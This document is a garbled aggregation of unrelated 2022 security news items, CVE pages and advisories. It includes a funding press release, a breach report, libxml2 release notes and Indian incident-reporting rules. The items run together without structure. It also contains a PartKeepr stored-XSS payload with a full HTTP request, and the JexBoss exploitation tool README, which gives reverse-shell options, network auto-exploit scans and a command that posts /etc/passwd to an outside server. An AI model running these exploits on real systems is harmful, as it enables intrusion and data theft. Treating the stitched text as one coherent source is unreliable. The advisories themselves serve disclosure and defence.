Funding follows dramatic revenue growth as identity-based access requirements skyrocket.

**OAKLAND, Calif., May 3, 2022** – Teleport, the leading provider of Identity-based Infrastructure Access Management, today announced it has raised $110 million in Series C funding led by Bessemer Venture Partners with participation from Insight Partners and existing investors Kleiner Perkins and S28 Capital. This investment brings Teleport’s total funding raised to $169 million at a current valuation of $1.1 billion, and comes after the company nearly tripled its revenue and doubled its customer base from 2020 to 2021.

As a part of the investment, Bessemer Venture Partners’ Mary D’Onofrio will take a seat on Teleport’s board, and Insight Partners’ Matt Koran will be a board observer. In August 2021, Teleport announced its $30 million Series B round led by S28 Capital and Kleiner Perkins.

“Growing complexity of modern cloud environments has led to a situation where managing secure access to infrastructure begins to break, as evidenced by increased frequency and severity of breaches.,” said Ev Kontsevoy, co-founder and CEO, Teleport. “Our customers are forward thinking organizations that are scaling quickly. They realized that the right way to scale access is consolidation across all protocols and environments. Our platform, the open-source Teleport Access Plane, addresses these challenges by giving every engineer, every piece of hardware and every application an identity. With identity based access for everyone and everything, more security threats are neutralized and the impact of breaches is dramatically reduced without impacting developer productivity.”

As organizations deal with complexity because of shifts to the cloud, modernization of IT stack and growth of mixed infrastructure environments, Teleport’s open-source Access Plane technology consolidates the four essential capabilities every security-conscious organization needs: connectivity, authentication, authorization and audit. By providing the only cloud-native, identity-based infrastructure access solution for humans and machines, Teleport eliminates network perimeter security issues, reduces attack surface area, cuts operational overhead, enforces security & compliance, and improves developer productivity, all at once.

With this latest funding, Teleport will expand its go-to-market organization to serve its fast-growing, global customer base. Teleport will also bolster its R&D organization to solve the most complex security challenges faced by organizations of all sizes.

“Now, more than ever, is the time to make it easy for any company to employ world class security practices as global cyber attacks become more and more sophisticated,” said Mary D’Onofrio, partner and co-founder of growth investment practice, Bessemer Venture Partners. “With Teleport, security becomes stronger \*and\* simpler for both humans and machines, making it possible to deploy and enforce security and compliance best-practices throughout all organizations. We’re excited to lead this round and I am looking forward to working closely with Ev and his team to offer elegant cybersecurity solutions to a growing customer base of household names.”

Customers including Doordash, Elastic, Nasdaq, Snowflake and others use Teleport to secure digital infrastructure access for remote and hybrid workforces and combat the ever-increasing cyber threats.

"Speed is key to our business. But so is security,” said Luke Christopherson, Software Engineer at Doordash. “The Teleport Access Plane allows our engineers to securely access the infrastructure they need to do their jobs without getting in the way of productivity. Everybody wins."

Teleport recently announced Teleport 9, the latest edition of the open-source Teleport Access Plane. This release introduced Teleport Machine ID which delivers identity-based access and audit capabilities for resources including servers and databases, CI/CD automation, service accounts and custom code in applications such as microservices. Teleport 9 also included Teleport Connect, a secure, developer-friendly browser for cloud infrastructure. The browser solves the issues posed by terminals optimized for local environments when a majority of development now happens in the cloud.

Steven Dickens, Senior Analyst, Futurum Research commented, "As digital transformation takes hold from the core to the edge, security becomes more critical. The team at Teleport are focused on delivering cloud-native, identity-based infrastructure access solutions for both humans and machines. The announcement today take the company one step closer to its mission of eliminating the need for secrets when accessing infrastructure, and as a result delivering both simpler, stronger identity-based authentication.”

To learn more about Teleport and today’s news, visit the company’s website or most recent blog about the funding.

**About Teleport**

Teleport, leading provider of Identity-based Infrastructure Access Management, consolidates the four essential infrastructure access capabilities every security-conscious organization needs: connectivity, authentication, authorization, and audit. Teleport’s unique approach is not only more secure but also improves developer productivity. Teleport is used by leading companies including Elastic, Snowflake, Doordash, and NASDAQ. The company is backed by Bessemer Venture Partners, Insight Partners, Kleiner Perkins, and S28 Capital. Headquartered in Oakland, California, the company embraces a remote-first work culture.

**About Bessemer Venture Partners**

Bessemer Venture Partners helps entrepreneurs lay strong foundations to build and forge long-standing companies. With more than 135 IPOs and 200 portfolio companies in the enterprise, consumer and healthcare spaces, Bessemer supports founders and CEOs from their early days through every stage of growth. Bessemer’s global portfolio includes Pinterest, Shopify, Twilio, Yelp, LinkedIn, PagerDuty, DocuSign, Wix, Fiverr and Toast and has $9 billion of capital under management. Bessemer has teams of investors and partners located in Tel Aviv, Silicon Valley, San Francisco, New York, London, Boston, Beijing and Bangalore. Born from innovations in steel more than a century ago, Bessemer’s storied history has afforded its partners the opportunity to celebrate and scrutinize its best investment decisions (see Memos) and also learn from its mistakes (see Anti-Portfolio).

Teleport Raises $110 Million Series C at $1.1 Billion Valuation Led by Bessemer Venture Partners

An issue was discovered in Logitech Options. The OAuth 2.0 state parameter was not properly validated. This leaves applications vulnerable to CSRF attacks during authentication and authorization operations.

*   Register
*   Getting Started
*   FAQ
*   Community
*   Downloads
*   Warranty
*   Specifications
*   Spare Parts
*   Gallery
*   Contact Us

**There are no Downloads for this Product**

**There are no FAQs for this Product**

**There are no Spare Parts available for this Product**

Logitech Options

More

Check our Logitech Warranty here

**Make the Most of your warranty**

Register Your Product FIle a Warranty Claim

**Frequently Asked Questions**

*   Windows
    
    {\[{versionList\[key\]}\]}
    
    Mac
    
    {\[{versionList\[key\]}\]}
    
    Other
    
    {\[{versionList\[key\]}\]}
    

**There are no Downloads for this Version.**

Show All Downloads

**Compatible Product**

**Product Specific Phone Numbers**

**Main Phone Numbers**

CVE-2022-0916: Logitech Options

Adaptive Health Integrations (AHI) has been breached. Sensitive information was accessed, but it took months to make the incident public.
The post US healthcare billing services group hacked, affecting at least half a million individuals appeared first on Malwarebytes Labs.

According to the US Department of Health and Human Services, Adaptive Health Integrations (AHI), a healthcare software and billing services firm in North Dakota, suffered a data breach that affected more than half a million individuals. According to the firm, the breach occurred in mid-October last year, but it only started notifying people last month.

The notification letter, a copy of which was posted on the Montana Attorney General’s website, states that the firm was made aware of the attack recently and immediately took action.

> “Upon learning of the issue, we contained the threat by disabling unauthorized access to our network and commenced a prompt and thorough investigation with assistance from external cybersecurity professionals. Through an extensive investigation and an internal review, which concluded on February 23, 2022, we determined that certain potentially accessed data contained personal information such as names, dates of birth, contact information, and Social Security numbers.”

The firm was quick to add that not all individuals were affected by the breach, and not all information about affected individuals was accessed.

The letter advises those affected on what they should do next. In it, individuals are encouraged to enrol in free, 12-month complimentary identity monitor services provided by a third party. Doing so opens up additional services to help clients, such as fraud consultation and identity theft restoration.

HIPAA Journal noted that the letter has no information about Adaptive Health Integrations or why it keeps people’s protected health information (PHI). Recipients of the letter also questioned its legitimacy because it used paper with a photocopied company logo, making it look dubious and unprofessional. After checking the website (screenshot below), some letter recipients thought it was a scam.

A couple of law firms, namely Murphy Law Firm in Oklahoma and Migliaccio & Rathod LLP in Washington, are conducting their own investigation on behalf of individuals affected by the breach. Both firms made their announcements days apart.

US healthcare billing services group hacked, affecting at least half a million individuals

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter.

**Description**

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter

**Reproduction Steps**

Browsing to Edit tab, select project and add new project.  
There, insert the following payload <img src=x onerror=alert(1)> in name field.

The request performed is the following, being name the vulnerable parameter :

    POST /api/projects HTTP/1.1
    Host: partkeepr.vuln
    Cookie: PHPSESSID=fju4llfcogfr2q9ug1bl982117
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Authorization: Basic YWRtaW46YWRtaW4=
    Content-Type: application/json
    X-Requested-With: XMLHttpRequest
    Content-Length: 303
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    {"name":"<img src=x onerror=alert(1)>","description":"","projectPartKeeprProjectBundleEntityProjectAttachments":[],"attachments":[],"projectPartKeeprProjectBundleEntityProjectParts":[],"parts":[],"projectPartKeeprProjectBundleEntityProjectRuns":[],"projectPartKeeprProjectBundleEntityReportProjects":[]}
    

Then, when another user goes to edit tab and clicks the project with the payload as name, XSS triggers

Apart from **projects** , the following tabs are also vulnerable : **footprints**,**manufacturers**,**storage locations**, **distributors**, **part measurement units** , **units** and **batch jobs**

**System Information**

*   PartKeepr Version: 1.4.0
*   Operating System: LInux
*   Web Server: Apache
*   PHP Version: 7.4
*   Database and version: Mysql
*   Reproducible on the demo system: Yes

CVE-2021-39390: Stored XSS in PartKeepr · Issue #1237 · partkeepr/PartKeepr

The US, EU member states, and other non-EU countries commit to this new internet declaration and encourage others to join.
The post Over 50 countries sign the “Declaration for the Future of the Internet” appeared first on Malwarebytes Labs.

Governments of the US, EU member states, and 32 other countries have announced the launch of the “Declaration for the Future of the Internet,” a “political commitment” among endorsers “to advance a positive vision for the internet and digital technologies.”

“We are united by a belief in the potential of digital technologies to promote connectivity, democracy, peace, the rule of law, sustainable development, and the enjoyment of human rights and fundamental freedoms,” the declaration began. “As we increasingly work, communicate, connect, engage, learn, and enjoy leisure time using digital technologies, our reliance on an open, free, global, interoperable, reliable, and secure Internet will continue to grow. Yet we are also aware of the risks inherent in that reliance and the challenges we face.”

The White House and the European Commission summarized the three-page proposition and invited other countries to sign. To date, the countries that endorse the declaration are Albania, Andorra, Argentina, Australia, Austria, Belgium, Bulgaria, Cabo Verde, Canada, Colombia, Costa Rica, Croatia, Cyprus, Czech Republic, Denmark, Dominican Republic, Estonia, the European Commission, Finland, France, Georgia, Germany, Greece, Hungary, Iceland, Ireland, Israel, Italy, Jamaica, Japan, Kenya, Kosovo, Latvia, Lithuania, Luxembourg, Maldives, Malta, Marshall Islands, Micronesia, Moldova, Montenegro, Netherlands, New Zealand, Niger, North Macedonia, Palau, Peru, Poland, Portugal, Romania, Senegal, Serbia, Slovakia, Slovenia, Spain, Sweden, Taiwan, Trinidad and Tobago, the United Kingdom, Ukraine, and Uruguay.

The declaration is a “political commitment” among endorsers to “advance a positive vision for the Internet and digital technologies.” It is a reaffirmation for endorsers that they’re committed to respecting and preserving human rights online across digital ecosystems and committing to “a single global internet” that fosters the following principles:

*   Protect human rights and fundamental freedoms of all people; 
*   Promote a global Internet that advances the free flow of information; 
*   Advance inclusive and affordable connectivity so that all people can benefit from the digital economy; 
*   Promote trust in the global digital ecosystem, including through protection of privacy; and 
*   Protect and strengthen the multi-stakeholder approach to governance that keeps the Internet running for the benefit of all.

A single, global internet rejects the idea of restricted internet access—a “splinternet”—that regimes like Russia, China, and North Korea (all of whom did not sign the declaration) have implemented in their own countries. Splinternets are heavily regulated, and governments can pick and choose what they want their citizens to see and not see.

While every country is working towards the common goal of building a better internet and online experience for everyone, now and in the future, the Declaration allows member countries to be autonomous in creating their own laws and policies to uphold the above principles.

“We believe that the principles for the future of the Internet are universal in nature and as  
such we invite those who share this vision to affirm these principles and join us in the implementation of this vision,” the declaration concludes.

Over 50 countries sign the “Declaration for the Future of the Internet”

In libxml2 before 2.9.14, several buffer handling functions in buf.c (xmlBuf*) and tree.c (xmlBuffer*) don't check for integer overflows. This can result in out-of-bounds memory writes. Exploitation requires a victim to open a crafted, multi-gigabyte XML file. Other software using libxml2's buffer functions, for example libxslt through 1.1.35, is affected as well.

**Download source code**

Release v2.9.14

**Security**

*   **\[CVE-2022-29824\]** Integer overflow in xmlBuf and xmlBuffer
*   Fix potential double-free in xmlXPtrStringRangeFunction
*   Fix memory leak in xmlFindCharEncodingHandler
*   Normalize XPath strings in-place
*   Prevent integer-overflow in htmlSkipBlankChars() and xmlSkipBlankChars() (David Kilzer)
*   Fix leak of xmlElementContent (David Kilzer)

**Bug fixes**

*   Fix parsing of subtracted regex character classes
*   Fix recursion check in xinclude.c
*   Reset last error in xmlCleanupGlobals
*   Fix certain combinations of regex range quantifiers
*   Fix range quantifier on subregex

**Improvements**

*   Fix recovery from invalid HTML start tags

**Build system, portability**

*   Define LFS macros before including system headers
*   Initialize XPath floating-point globals
*   configure: check for icu DEFS (James Hilliard)
*   configure.ac: produce tar.xz only (GNOME policy) (David Seifert)
*   CMakeLists.txt: Fix LIBXML\_VERSION\_NUMBER
*   Fix build with older Python versions
*   Fix --without-valid build

CVE-2022-29824: v2.9.14 · Tags · GNOME / libxml2

**Security**

*   **\[CVE-2022-29824\]** Integer overflow in xmlBuf and xmlBuffer
*   Fix potential double-free in xmlXPtrStringRangeFunction
*   Fix memory leak in xmlFindCharEncodingHandler
*   Normalize XPath strings in-place
*   Prevent integer-overflow in htmlSkipBlankChars() and xmlSkipBlankChars() (David Kilzer)
*   Fix leak of xmlElementContent (David Kilzer)

**Bug fixes**

*   Fix parsing of subtracted regex character classes
*   Fix recursion check in xinclude.c
*   Reset last error in xmlCleanupGlobals
*   Fix certain combinations of regex range quantifiers
*   Fix range quantifier on subregex

**Improvements**

*   Fix recovery from invalid HTML start tags

**Build system, portability**

*   Define LFS macros before including system headers
*   Initialize XPath floating-point globals
*   configure: check for icu DEFS (James Hilliard)
*   configure.ac: produce tar.xz only (GNOME policy) (David Seifert)
*   CMakeLists.txt: Fix LIBXML\_VERSION\_NUMBER
*   Fix build with older Python versions
*   Fix --without-valid build

All versions of package `com.alibaba.oneagent:one-java-agent-plugin` are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) using a specially crafted archive that holds directory traversal filenames (e.g. `../../evil.exe`). The attacker can overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.

**Path Traversal in com.alibaba.oneagent:one-java-agent-plugin**

Moderate severity GitHub Reviewed Published May 3, 2022 • Updated May 20, 2022

GHSA-9hr3-j9mc-xmq2: Path Traversal in com.alibaba.oneagent:one-java-agent-plugin

The Java Remote Management Interface of all versions of Orlansoft ERP was discovered to contain a vulnerability due to insecure deserialization of user-supplied content, which can allow attackers to execute arbitrary code via a crafted serialized Java object.

**JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool**

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.

**Requirements**

*   Python >= 2.7.x
*   urllib3
*   ipaddress

**Installation on Linux\\Mac**

To install the latest version of JexBoss, please use the following commands:

    git clone https://github.com/joaomatosf/jexboss.git
    cd jexboss
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    
    OR:
    
    Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
    unzip master.zip
    cd jexboss-master
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    

If you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl:

    yum -y install centos-release-scl
    yum -y install python27
    scl enable python27 bash
    

**Installation on Windows**

If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:

*   Download and install Python
*   Download and install Git for Windows
*   After installing, run the Git for Windows and type the following commands:

        PATH=$PATH:C:\Python27\
        PATH=$PATH:C:\Python27\Scripts
        git clone https://github.com/joaomatosf/jexboss.git
        cd jexboss
        pip install -r requires.txt
        python jexboss.py -h
        python jexboss.py -host http://target_host:8080
        
    

**Features**

The tool and exploits were developed and tested for:

*   JBoss Application Server versions: 3, 4, 5 and 6.
*   Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)

The exploitation vectors are:

*   /admin-console
    *   tested and working in JBoss versions 5 and 6
*   /jmx-console
    *   tested and working in JBoss versions 4, 5 and 6
*   /web-console/Invoker
    *   tested and working in JBoss versions 4, 5 and 6
*   /invoker/JMXInvokerServlet
    *   tested and working in JBoss versions 4, 5 and 6
*   Application Deserialization
    *   tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
*   Servlet Deserialization
    *   tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)
*   Apache Struts2 CVE-2017-5638
    *   tested in Apache Struts 2 applications
*   Others

**Videos**

*   Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss

*   Exploiting JBoss Application Server with JexBoss

*   Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)

**Screenshots**

*   Simple usage examples:

*   Example of standalone mode against JBoss:

    $ python jexboss.py -u http://192.168.0.26:8080
    

 

*   Usage modes:

*   Network scan mode:

    $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt
    

*   Network scan with auto-exploit mode:

    $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt
    

*   Results and recommendations:

**Reverse Shell (meterpreter integration)**

After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:

       jexremote=YOUR_IP:YOUR_PORT
    
       Example:
         Shell>jexremote=192.168.0.10:4444
    

*   Example: 

When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute.

**Usage examples**

*   For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:

    $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'
    

*   For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):

    $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
    

*   For Java Deserialization Vulnerabilities in a Servlet (like Invoker):

    $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
    

*   For Apache Struts 2 (CVE-2017-5638)

    $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
    

*   For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources

    $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
    

*   Auto scan mode:

    $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
    

*   File scan mode:

    $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
    

*   More Options:

    optional arguments:
      -h, --help            show this help message and exit
      --version             show program's version number and exit
      --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE
                            PERMISSION!!!)
      --disable-check-updates, -D
                            Disable two updates checks: 1) Check for updates
                            performed by the webshell in exploited server at
                            http://webshell.jexboss.net/jsp_version.txt and 2)
                            check for updates performed by the jexboss client at
                            http://joaomatosf.com/rnp/releases.txt
      -mode {standalone,auto-scan,file-scan}
                            Operation mode (DEFAULT: standalone)
      --app-unserialize, -j
                            Check for java unserialization vulnerabilities in HTTP
                            parameters (eg. javax.faces.ViewState, oldFormData,
                            etc)
      --servlet-unserialize, -l
                            Check for java unserialization vulnerabilities in
                            Servlets (like Invoker interfaces)
      --jboss               Check only for JBOSS vectors.
      --jenkins             Check only for Jenkins CLI vector.
      --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat
                            (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be
                            checked by default.
      --proxy PROXY, -P PROXY
                            Use a http proxy to connect to the target URL (eg. -P
                            http://192.168.0.1:3128)
      --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                            Proxy authentication credentials (eg -L name:password)
      --jboss-login LOGIN:PASS, -J LOGIN:PASS
                            JBoss login and password for exploit admin-console in
                            JBoss 5 and JBoss 6 (default: admin:admin)
      --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)
    
    Standalone mode:
      -host HOST, -u HOST   Host address to be checked (eg. -u
                            http://192.168.0.10:8080)
    
    Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
      --reverse-host RHOST:RPORT, -r RHOST:RPORT
                            Remote host address and port for reverse shell when
                            exploiting Java Deserialization Vulnerabilities in
                            application layer (for now, working only against *nix
                            systems)(eg. 192.168.0.10:1331)
      --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d
                            @/etc/passwd http://your_server)
      --windows, -w         Specifies that the commands are for rWINDOWS System$
                            (cmd.exe)
      --post-parameter PARAMETER, -H PARAMETER
                            Specify the parameter to find and inject serialized
                            objects into it. (egs. -H javax.faces.ViewState or -H
                            oldFormData (<- Hi PayPal =X) or others) (DEFAULT:
                            javax.faces.ViewState)
      --show-payload, -t    Print the generated payload.
      --gadget {commons-collections3.1,commons-collections4.0,groovy1}
                            Specify the type of Gadget to generate the payload
                            automatically. (DEFAULT: commons-collections3.1 or
                            groovy1 for JenKins)
      --load-gadget FILENAME
                            Provide your own gadget from file (a java serialized
                            object in RAW mode)
      --force, -F           Force send java serialized gadgets to URL informed in
                            -u parameter. This will send the payload in multiple
                            formats (eg. RAW, GZIPED and BASE64) and with
                            different Content-Types.
    
    Auto scan mode:
      -network NETWORK      Network to be checked in CIDR format (eg. 10.0.0.0/8)
      -ports PORTS          List of ports separated by commas to be checked for
                            each host (eg. 8080,8443,8888,80,443)
      -results FILENAME     File name to store the auto scan results
    
    File scan mode:
      -file FILENAME_HOSTS  Filename with host list to be scanned (one host per
                            line)
      -out FILENAME_RESULTS
                            File name to store the file scan results
    
    

**Questions, problems, suggestions and etc:**

*   joaomatosf@gmail.com

CVE-2020-23620: GitHub - joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool

CERT-In updates cybersecurity rules to include mandatory reporting, record-keeping, and more.

The Indian Computer Emergency Response Team (CERT-In) issued new cyber incident reporting guidelines, including the requirement for service providers, intermediaries, data centers, corporations, and government agencies to report cyber incidents to the regulator within six hours.

The new government-issued cybersecurity rules will take effect in 60 days.

Incidents requiring immediate CERT-In notification include:

*   Targeted scanning/probing of critical networks/systems
*   Compromise of critical systems/information
*   Unauthorized access of IT systems/data
*   Defacement of website or intrusion into a website and unauthorized changes such as inserting malicious code, links to external websites, etc.
*   Malicious code attacks such as spreading of virus/ worm/ Trojan/ bots/ spyware/ ransomware/ cryptominers
*   Attack on servers such as database, mail, and DNS, and network devices such as routers
*   Identity theft, spoofing, and phishing attacks
*   Denial of service (DoS) and distributed denial of service (DDoS) attacks
*   Attacks on critical infrastructure, SCADA and operational technology systems, and wireless networks
*   Attacks on applications such as e-governance, e-commerce, etc.
*   Data breach
*   Data leak
*   Attacks on Internet of Things (IoT) devices and associated systems, networks, software, and servers
*   Attacks or incident affecting digital payment systems
*   Attacks through malicious mobile apps
*   Fake mobile apps
*   Unauthorized access to social media accounts
*   Attacks or malicious/ suspicious activities affecting cloud computing systems/ servers/ software/ applications
*   Attacks or malicious/suspicious activities affecting systems/ servers/ networks/ software/ applications related to big data, blockchain, virtual assets, virtual asset exchanges, custodian wallets, robotics, 3D and 4D printing, additive manufacturing, and drones
*   Attacks or malicious/ suspicious activities affecting systems/ servers/software/ applications related to artificial intelligence and machine learning

Other new rules require service providers and their intermediaries, data centers, corporations, and government agencies to connect to the Network Time Protocol (NTP) server of the National Informatics Center (NIC) or National Physical Laboratory (NPL) — or with servers that can be traced back to one of those two servers — and synchronize their ICT system clocks with the government's.

These organizations will also need to start keeping logs for the previous 180 days and provide it to CERT-In if an incident occurs, the new guidelines said.

The tightening up of reporting rules is intended to close "certain gaps causing hinderance in incident analysis," the Ministry of Electronics & IT said in its statement announcing the new cybersecurity measures. "These directions shall enhance overall cyber security posture and ensure safe and trusted Internet in the country."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Tag

#mac